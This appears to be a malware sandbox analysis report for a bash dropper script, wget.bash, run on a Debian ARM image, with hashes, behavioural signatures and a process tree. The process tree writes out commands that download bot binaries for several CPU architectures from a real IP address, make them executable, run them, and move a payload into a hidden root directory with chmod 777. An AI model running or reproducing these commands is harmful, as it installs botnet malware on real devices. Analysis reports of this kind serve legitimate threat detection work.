2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826 | Triage

Resubmissions

09-08-2022 18:31

220809-w6eersgaa2 5

09-08-2022 18:18

220809-wxyr2sfgg7 5

Analysis

max time kernel
0s
max time network
158s
platform
linux_armhf
resource
debian9-armhf-en-20211208
resource tags

arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
09-08-2022 18:18

Sharing

Report Analysis Logs

General

Target

wget.bash
Size

2KB
MD5

9486bdff70b6ec6243b012a91e90c21e
SHA1

2364e70ee0d49e4e641fa7428958f5907a8c26a3
SHA256

2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826
SHA512

e64e2324c403d967d3d04140bb0eba159e57b83db09fdd50e882a8edc595211837505c86c1d44a65d11b9c3a34c0d02496b3c06f264e1175e248397e9716b4bd

Score

5^/10

Malware Config

Signatures

Reads runtime system information 3 IoCs
Reads data from /proc virtual filesystem.

Processes:

mvmkdir

description ioc process

/proc/filesystems /proc/filesystems mv
/proc/378/exe /proc/378/exe
/proc/filesystems /proc/filesystems mkdir
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

wget.bash

description ioc process

/tmp/wget.bash /tmp/wget.bash wget.bash

/tmp/wget.bash
/tmp/wget.bash
1⤵
- Writes file to tmp directory
PID:346

/usr/bin/wget
wget http://109.206.241.211/bins/bot.mips
2⤵
PID:348

/bin/cat
cat bot.mips
2⤵
PID:354

/bin/chmod
chmod +x bot.mips fuwwyowo systemd-private-1470920eed684cbf874e665fe63d153d-systemd-timesyncd.service-tFHa8W wget.bash
2⤵
PID:355

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:356

/usr/bin/wget
wget http://109.206.241.211/bins/bot.mpsl
2⤵
PID:358

/bin/cat
cat bot.mpsl
2⤵
PID:360

/bin/chmod
chmod +x bot.mips bot.mpsl fuwwyowo systemd-private-1470920eed684cbf874e665fe63d153d-systemd-timesyncd.service-tFHa8W wget.bash
2⤵
PID:361

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:362

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm
2⤵
PID:364

/bin/cat
cat bot.arm
2⤵
PID:366

/bin/chmod
chmod +x bot.arm bot.mips bot.mpsl fuwwyowo systemd-private-1470920eed684cbf874e665fe63d153d-systemd-timesyncd.service-tFHa8W wget.bash
2⤵
PID:367

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:368

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm5
2⤵
PID:369

/bin/cat
cat bot.arm5
2⤵
PID:371

/bin/chmod
chmod +x bot.arm bot.arm5 bot.mips bot.mpsl fuwwyowo systemd-private-1470920eed684cbf874e665fe63d153d-systemd-timesyncd.service-tFHa8W wget.bash
2⤵
PID:373

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:375

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm6
2⤵
PID:377

/bin/cat
cat bot.arm6
2⤵
PID:385

/bin/sh
sh -c "mkdir /l43i8preyl/ && >/l43i8preyl/l43i8preyl && cd /l43i8preyl/ >/dev/null"
1⤵
PID:379

/bin/mkdir
mkdir /l43i8preyl/
2⤵
- Reads runtime system information
PID:380

/bin/sh
sh -c "mv /tmp/fuwwyowo /l43i8preyl/l43i8preyl && chmod 777 /l43i8preyl/l43i8preyl >/dev/null"
1⤵
PID:381

/bin/mv
mv /tmp/fuwwyowo /l43i8preyl/l43i8preyl
2⤵
- Reads runtime system information
PID:382

/bin/chmod
chmod 777 /l43i8preyl/l43i8preyl
2⤵
PID:384

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...